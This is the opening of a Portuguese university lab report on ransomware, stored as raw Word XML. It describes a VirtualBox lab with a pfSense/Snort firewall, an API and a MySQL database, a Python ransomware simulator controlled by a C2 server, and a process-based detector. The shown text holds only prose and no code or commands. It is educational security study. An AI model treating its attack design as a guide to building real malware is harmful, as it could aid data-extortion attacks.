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B91C9" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A518CD" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFC873E" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D7ABE1" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A166D59" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3672DA30" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54CE2304" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117EE899" w14:textId="096DCFEB" w:rsidR="00DA16FE" w:rsidRPr="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE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DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>RANSOMWARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03C0FF" w14:textId="3CC672F9" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TÓPICOS AVANÇADOS EM COMPUTADORES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA24FAB" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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BD1AE3" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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F76162" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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FC895C" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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4CEFDB" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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EDA1E" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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8C3AC9" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16F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10A4C" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16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F9B559" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16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DE5DB" w14:textId="77777777" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16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11DE4D" w14:textId="6F4CDEB4" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Grupo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Gustavo Mello Tonnera </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>211055272</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) e</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Leandro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kornelius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Belloti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00862EBB" w:rsidRPr="00862EBB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>211020900</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1D8333" w14:textId="51EB2448" w:rsidR="00DA16FE" w:rsidRPr="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Professora: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00DA16FE">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>Lorena de Souza Bezerra Borges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="487C8EF3" w14:textId="7F0ACB2F" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00DA16FE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Universidade de Brasília (UnB) - 2025.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22A89F" w14:textId="0F0FA365" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="00300E1E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1. RESUMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADC646" w14:textId="79EFE7C0" w:rsidR="00300E1E" w:rsidRPr="00300E1E" w:rsidRDefault="00300E1E" w:rsidP="00300E1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00E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Este relatório descreve a construção e análise de um ambiente laboratorial com o objetivo de simular e estudar ataques de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> em um contexto educacional. A simulação foi realizada em três máquinas virtuais conectadas em uma rede privada: uma contendo um firewall </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> com IDS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, outra com uma API desenvolvida em </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NestJS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e a última com um banco de dados MySQL. Um malware em Python foi desenvolvido para simular um ataque de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, sendo controlado remotamente por um servidor C2. A partir dessa simulação, também foi implementado um sistema de detecção, utilizando C++ e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, que identifica processos suspeitos na máquina do banco de dados. A atividade permitiu o aprofundamento prático dos conceitos de segurança computacional, abordando estratégias de prevenção, detecção e resposta a incidentes de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00300E1E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> em ambientes reais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470093FE" w14:textId="0C45BAF5" w:rsidR="00DA16FE" w:rsidRDefault="00DA16FE" w:rsidP="008E2267">
      <w:pPr>
        <w:spacing w:before="240"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INTRODUÇÃO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4EBFA9" w14:textId="2E916934" w:rsidR="00E4389C" w:rsidRPr="00E4389C" w:rsidRDefault="00E4389C" w:rsidP="00A53AF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E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A segurança computacional tem se tornado um tema essencial no cenário acadêmico e profissional, sobretudo diante do aumento de ataques cibernéticos que afetam sistemas críticos e organizações em todo o mundo. Dentre os diversos tipos de ameaças, o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> se destaca pela sua capacidade de causar prejuízos financeiros e operacionais significativos, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>impossibilitando o acesso aos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> dados </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">dos sistemas </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">e exigindo resgate para sua liberação. Nesse contexto, o presente relatório descreve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a metodologia usada pelo grupo</w:t>
      </w:r>
      <w:r w:rsidRPr="00E438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para</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> estudar, simular e compreender os mecanismos por trás de ataques de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, bem como avaliar estratégias de defesa e prevenção.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071B762A" w14:textId="5945F081" w:rsidR="00E4389C" w:rsidRPr="00E4389C" w:rsidRDefault="00E4389C" w:rsidP="00A53AF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E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Para isso, foi desenvolvido um laboratório controlado, composto por três máquinas virtuais, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>por meio</w:t>
      </w:r>
      <w:r w:rsidRPr="00E438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Pr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">o software de virtualização </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Esse ambiente simulado permitiu a reprodução de um cenário realista de ataque e defesa, possibilitando que os alunos aplicassem conceitos teóricos em uma situação prática. A primeira máquina virtual foi configurada para atuar como um ponto de segurança da rede, contendo um firewall e um sistema de detecção de intrusos (IDS), enquanto a segunda hospedava uma API simulando um sistema de academia. Já a terceira máquina continha um banco de dados que armazenava os dados do sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> da academia</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4390CC79" w14:textId="3549E478" w:rsidR="00E4389C" w:rsidRPr="00E4389C" w:rsidRDefault="00E4389C" w:rsidP="00A53AF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E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A simulação do ataque foi realizada por meio do desenvolvimento de um malware escrito em Python, projetado para se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">estabelecer uma conexão </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>remota</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> entre a máquina infectada e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> a máquina </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>do atacante</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. O malware permit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> ao atacante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>acessar o banco de dados do sistema e comprometer informações importantes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Essa abordagem prática foi </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>fundamental para ilustrar de forma clara os riscos e vulnerabilidades presentes em sistemas que não possuem proteções adequadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25012609" w14:textId="18D73517" w:rsidR="00E4389C" w:rsidRPr="00E4389C" w:rsidRDefault="00E4389C" w:rsidP="00A53AF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E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Após a simulação do ataque, fo</w:t>
      </w:r>
      <w:r w:rsidR="00330273">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementada </w:t>
      </w:r>
      <w:r w:rsidR="00330273">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">uma </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>soluç</w:t>
      </w:r>
      <w:r w:rsidR="00330273">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ão</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> para a detecção do malware, com foco na </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>detecção de processos que não deveriam estar sendo executados no servidor.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4389C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Essa etapa evidenciou a importância de ferramentas de segurança no diagnóstico precoce de ameaças, além de estimular a análise crítica dos estudantes em relação à eficácia das soluções empregadas. Através dessa análise, foi possível entender melhor os métodos que os atacantes utilizam para evadir a detecção.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319C083B" w14:textId="23AF4078" w:rsidR="00DA16FE" w:rsidRDefault="00E4389C" w:rsidP="008E2267">
      <w:pPr>
        <w:spacing w:before="240"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DA16FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. LABORATÓRIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792569FE" w14:textId="77777777" w:rsidR="00A53AF3" w:rsidRPr="00A53AF3" w:rsidRDefault="00A53AF3" w:rsidP="00A53AF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A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A primeira etapa do desenvolvimento do laboratório envolveu a definição da infraestrutura necessária para simular um ambiente realista de rede sujeito a ataques de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inicialmente, foi considerada a utilização dos serviços da AWS para a hospedagem das máquinas virtuais. No entanto, os custos associados à manutenção contínua dos recursos na nuvem tornaram inviável a adoção dessa abordagem para fins acadêmicos. Diante disso, optou-se por implementar a solução de forma local, utilizando o software </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, o que permitiu maior controle sobre o ambiente e a flexibilidade necessária para testes e configurações específicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B602345" w14:textId="77777777" w:rsidR="00A53AF3" w:rsidRPr="00A53AF3" w:rsidRDefault="00A53AF3" w:rsidP="00A53AF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A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">A topologia da rede foi composta por três máquinas virtuais interconectadas em uma rede privada. A primeira máquina foi destinada à segurança da rede, sendo configurada com o sistema </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pfSense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, que atua como firewall e roteador do ambiente. Além disso, foi instalado e configurado o sistema de detecção de intrusos (IDS) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Snort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A53AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
